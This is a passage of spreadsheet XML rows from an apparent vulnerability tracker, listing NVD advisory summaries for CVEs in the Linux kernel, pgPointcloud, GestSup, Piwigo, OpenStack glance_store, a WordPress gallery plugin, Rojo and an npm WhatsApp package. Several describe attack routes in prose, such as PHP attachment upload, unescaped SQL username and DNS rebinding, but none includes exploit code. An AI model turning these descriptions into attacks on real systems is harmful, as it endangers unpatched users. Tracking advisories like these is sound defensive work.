      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Allocate split page tables as kernel page tables
A PTE is allocated directly without going through the standard page table
allocation routines (such as pte_alloc_one_kernel()) when the CPA code
splits a large page (__split_large_page()).
This means the page table constructor is never called nor is the page table
marked as a kernel page table.
The former results in the folio associated with the page table not being
marked as a page table (__pagetable_ctor() is never called thus neither is
__folio_set_pgtable()) nor are statistics updated to reflect
it (lruvec_stat_add_folio() is never called).
The latter issue of failing to mark the page table as a kernel page
table (ptdesc_set_kernel() is never called) is far more problematic.
Since commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
kernel page table freeing has been batched and since the
subsequent commit:
  e37d5a2d60a3 ("iommu/sva: invalidate stale IOTLB entries for kernel address space")
IOTLB cache entries for kernel page tables have been invalidated upon
being freed.
Since split page tables are freed without this invalidation, the IOTLB
can contain stale entries for them.
Resolve the issue by using the ordinary PTE allocation API at split time.
This results in these kernel page tables invoking a page table constructor,
and thus requires a page table destructor.
Destructors are not always present, like for early allocated direct map
page tables). Conditionally call pagetable_dtor_free() if the PG_table
folio flag for the ptdesc is set, otherwise we free the page table via
pagetable_free().
Regardless of which path is taken page tables marked as kernel page tables,
which now includes split page tables, take the correct route through
pagetable_free_kernel().
There is a user-visible side effect in that split page tables will appear
in nr_page_table_pages in /proc/vmstat (as do other kernel page tables
allocated after early boot), however this is a positive change.
This issue started being markedly problematic after commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
so choose this as the Fixes target.
[ dhansen: rephrase in imperative mood ]</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97525</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100387</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>pgPointcloud through 1.2.5 contains a heap out-of-bounds read vulnerability in dimensional patch WKB deserialization that allows authenticated database users to read adjacent heap memory. Attackers can supply crafted pcpatch values with attacker-controlled size fields to copy heap memory into stored patches for exfiltration or crash the PostgreSQL backend.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100387</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100389</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.61 contain a remote code execution vulnerability in the basic IMAP connector's attachment handling that fails to skip blocked file extensions. Unauthenticated attackers can send emails with PHP attachments to monitored mailboxes, which are written to the web-accessible upload/ticket directory and executed when accessed.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100389</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100532</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>@openclaw/whatsapp (npm) before 2026.8.1 exposes the WhatsApp login tool through the generic channel-tool path without preserving the originating sender's owner status, so the owner-only tool boundary is not enforced. An admitted non-owner sender able to steer the tool can request a forced login and receive a new QR code for a configured account, disconnecting the Gateway's WhatsApp account and causing loss of availability; full account relinking additionally requires the attacker to scan the returned QR code with another phone. The issue affects the owner-only tool boundary rather than WhatsApp transport authentication. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100532</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44642</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, check_upgrade_access_rights() in admin/include/functions_upgrade.php conditionally escapes the submitted username only when the removed get_magic_quotes_gpc function exists, so PHP 8 and later concatenate an unauthenticated username directly into the upgrade authentication SQL query. When database upgrades are pending, a crafted query result can satisfy the status and password checks, set PHPWG_IN_UPGRADE, and authorize upgrade execution without valid administrator credentials. This can cause unauthorized database integrity changes and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44642</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51773</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>vmware</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>An issue in the VMware datastore driver of OpenStack glance_store. When an authenticated attacker provides a maliciously crafted image location URI pointing to an external server, the _retry_request function fails to validate the destination host before attaching sensitive authentication headers.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51773</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92713</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the upload_image function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server. The path restriction to wp-content/uploads is not an effective ownership boundary, as all user attachment files reside within that tree, and Authors trivially satisfy the edit_post check on their own galleries.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92713</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97570</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Bound SW TPA IDs to prevent crashes
FW supports up to 1024 concurrent TPAs, so the FW TPA ID is in the range
0..1023 (see commit ec4d8e7cf024 ("bnxt_en: Add TPA ID mapping logic for
57500 chips.")). bnxt_alloc_agg_idx is intended to wrap the FW ID down to a
software ID which is used to index rxr-&gt;rx_tpa, and to generate a mapping
between FW IDs and the wrapped software ID.
On a 57608 with firmware version 233, the firmware advertises 32
concurrent TPAs. As of the commit under fixes, bp-&gt;max_tpa on this NIC
is set to 32.
If the software ID from bnxt_alloc_agg_idx is above 31, this results in
an invalid address being loaded on this line:
  tpa_info = &amp;rxr-&gt;rx_tpa[agg_id];
because rx_tpa is allocated with only bp-&gt;max_tpa (32) entries. Writes
to tpa_info later in the code are out of bounds.
This bug results in a crash at boot:
Oops: general protection fault, kernel NULL pointer dereference 0x8: 0000 [#1] SMP NOPTI
RIP: 0010:bnxt_rx_pkt+0xc0/0x1560
RSP: 0018:ffffc900009b8c78 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000048 RCX: 0000000206682516
RDX: ffffc900009b8db4 RSI: 0000000000000000 RDI: 01ffffff038fe1c0
RBP: ffffc9006e687480 R08: ffffc9006e687000 R09: 0000000000003048
R10: 0000000000000480 R11: ffff8881c6083900 R12: 0000000006682516
R13: ffff8881c6095400 R14: 0000000000000016 R15: ffff8881c6b66680
FS:  0000000000000000(0000) GS:ffff88fef3c77000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007fc8bda40584 CR3: 000000807c812001 CR4: 0000000008772ef0
PKRU: 55555554
Call Trace:
 &lt;IRQ&gt;
 ? __netif_receive_skb_list_core+0x1ca/0x250
 __bnxt_poll_work+0x152/0x280
 bnxt_poll_p5+0x1cd/0x480
 __napi_poll+0x30/0x180
 net_rx_action+0x20b/0x3b0
 ? note_gp_changes+0x53/0xe0
 ? tick_setup_sched_timer+0x180/0x180
 ? __napi_schedule+0x9a/0xb0
 ? bnxt_msix+0x24/0x30
 handle_softirqs+0xdd/0x2c0
 __irq_exit_rcu.llvm.3171231171502365008+0x47/0xf0
 common_interrupt+0x85/0x90
 &lt;/IRQ&gt;
 &lt;TASK&gt;
 asm_common_interrupt+0x22/0x40
This stack trace is from a crash triggered when an out of bounds rx_tpa
is dereferenced. The invalid write mentioned above is silent in this
particular crash.
Fix this by allocating rx_tpa with bp-&gt;max_tpa rounded up to the next
power of 2 (bp-&gt;max_tpa_roundup_size) entries and masking the FW TPA ID
with that size, so the wrapped ID can never index past the end of the
array.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97570</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97573</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Handle buffer allocation failure in bnxt_rx_ring_reset()
bnxt_rx_ring_reset() frees the ring buffers and then reallocates them,
ignoring the result.
bnxt_alloc_one_rx_ring() can fail in bnxt_alloc_one_tpa_info_data(), which
returns -ENOMEM on the first failed allocation and leaves the remaining
rxr-&gt;rx_tpa[] entries zeroed.
The error isn't propagated up, so the loop in bnxt_rx_ring_reset
continues and at the end the code re-enables TPA with partially
unallocated rx_tpa array.
This means that when the agg_id from hardware is mapped to a SW index in
rxr-&gt;rx_tpa[], an uninitialized slot can be chosen which would hand a
zero DMA address to the device.
Fix this by falling back to a global reset, which is what the existing
code already does when other functions fail, but unlike the other
failure cases this particular failure has to return because TPA can't
be re-enabled since the allocation failed.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97573</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97875</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-350</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Rojo's "rojo serve" HTTP API (default port 34872) has no Host/Origin header validation, making it vulnerable to DNS rebinding. A malicious webpage can read all project source, write malicious code to files on disk, and launch local programs via opener::open() with no user interaction beyond visiting the page.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97875</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98069</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire the fastpath locks in rds_conn_shutdown()
rds_conn_shutdown() quiesces the transmit and receive-refill paths by
waiting for RDS_IN_XMIT and RDS_RECV_REFILL to be sampled clear, and
then runs the transport shutdown and rds_conn_path_reset().  Sampling
the bits clear is not the same as owning them: the moment after the
wait_event() returns, rds_send_xmit() can re-acquire RDS_IN_XMIT (or
rds_ib_recv_refill() can re-acquire RDS_RECV_REFILL) and run
concurrently with the teardown.
The sender does recheck the connection state after taking the lock,
but that recheck is a classic store-buffering pattern: teardown writes
the state and reads the bit while the sender writes the bit and reads
the state.  acquire_in_xmit() is only an acquire operation, so on
weakly ordered architectures both sides can miss each other's write,
and the transmit path then runs while the transport zeroes its rings
(e.g. rds_ib_ring_init()) and rds_send_path_reset() rewrites the
transmit state under it.
Oracle UEK fixed the same class of crashes - a 14-year tail of
BUG_ON()s in rds_ib_sub_signaled(), unexpected op-codes and NULL
dereferences in rds_ib_send_cqe_handler() during failover testing -
by making the teardown path *acquire* the fastpath bit locks instead
of testing them ("rds: Make sure transmit path and connection
tear-down does not run concurrently").  Ownership of a single word is
decided by RMW atomicity, so no cross-variable ordering is needed.
Do the same here: take both locks before calling the transport
shutdown, hold them across rds_conn_path_reset(), and release them
explicitly with a wake-up afterwards.  Both are released with
clear_bit_unlock(), so that the ring re-initialization done by the
transport shutdown and the transmit state rewritten by
rds_send_path_reset() are ordered before either bit is seen clear by
the next acquire_in_xmit() or acquire_refill().
The fastpath users of these bits - rds_send_xmit() and
rds_ib_recv_refill() - are trylock style and back off while teardown
owns the locks, so no new lock dependency is introduced for them.
rds_tcp_reset_callbacks() is different: since the previous patch it
acquires RDS_IN_XMIT as well, and it blocks doing so, so its wait now
spans the teardown instead of at most one send batch.  That waiter
runs from rds_tcp_accept_one() on the single-threaded krdsd workqueue
and holds rds_tcp_accept_lock and t_conn_path_lock while it waits, so
a duelling SYN accepted while its path is being torn down parks
accept processing for the duration of the teardown - for TCP bounded
by the (up to 5 s) drain loop in rds_tcp_conn_path_shutdown().  An IB
path's drain in rds_ib_conn_path_shutdown() has no round cap, but no
blocking waiter either: rds_tcp_reset_callbacks() is the only blocking
acquirer of these bits and waits only on its own TCP path, and the
fastpaths are trylock-and-back-off on both transports, so a long IB
drain lengthens only that path's own quiesce.  The
window is narrow: the accept-side state check has to pass before the
teardown moves the path to RDS_CONN_DISCONNECTING.
Because krdsd is a single global workqueue, everything else queued
there - accept processing for other connections and network
namespaces, and the flush_workqueue(rds_wq) in rds_tcp_listen_stop()
during namespace teardown - waits behind the parked accept worker for
that time.  It cannot deadlock, although the waits do point at each
other: the teardown blocks until the bit's holder releases it, and
the holder may be that krdsd accept worker.  The holder finishes
without needing anything the teardown owns: the sync cancels
rds_tcp_reset_callbacks() issues target cp_send_w and cp_recv_w on
the path's ordered cp_wq, whose only execution slot is occupied by
the blocked cp_down_w itself, so they are pending at most and cancel
without flushing - a reliance on cp_wq being ordered that is now
noted next to those cancels (on 
---truncated---</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98069</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98070</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire RDS_IN_XMIT in rds_tcp_reset_callbacks()
rds_tcp_reset_callbacks() quiesces the transmit path by setting the
path state to RDS_CONN_RESETTING and then waiting for RDS_IN_XMIT to
be sampled clear before swapping the underlying socket and calling
rds_send_path_reset().
Sampling the bit clear is not the same as owning it: rds_send_xmit()
can re-acquire RDS_IN_XMIT right after the wait_event() returns.  Its
state recheck after taking the lock is a store-buffering pattern (the
resetter writes the state and reads the bit, the sender writes the
bit and reads the state) and acquire_in_xmit() is only an acquire
operation, so on weakly ordered architectures both sides can miss
each other's write and the transmit path then runs concurrently with
rds_send_path_reset() rewriting cp_xmit_* state - which is exactly
what the comment above rds_send_path_reset() tells its callers to
prevent.
Take the lock instead, hold it across the socket swap and
rds_send_path_reset(), and release it with a wake-up at the end.  The
lock-ordering constraint documented above the wait still holds: the
lock is acquired before lock_sock(), so a sender inside tcp_sendmsg()
can never be waited on while we hold the socket lock.
Two details of the old code go away with the same change:
 - t_sock is now read only after the lock is acquired.  The old code
   cached it before waiting; the teardown in rds_conn_shutdown()
   releases that socket and clears t_sock, so a pointer cached before
   the wait can be stale by the time the accept path resumes.  Reading
   it under RDS_IN_XMIT is what makes the exclusion complete once the
   teardown owns the same lock, which the next patch arranges; until
   then the teardown still only samples the bit, and the two paths
   remain as exposed to each other as they are today.
 - The old !osock early path called rds_send_path_reset() with no
   serialization at all.  It now runs under the lock like the normal
   path.  The conditional RDS_CONN_RESETTING transition of the
   previous patch happens before the socket check either way: a path
   found without a socket is either still connecting (its reconnect
   worker blocked on t_conn_path_lock) and legitimately goes
   RESETTING -&gt; UP on the new socket, or it has been torn down
   meanwhile and is dropped.
The in-function comment describing the old wait-based quiesce is
rewritten to describe the lock-based one, and the stale block comment
above the function (which still described a return value and an
incomplete list of t_sock writers) is refreshed to name all four
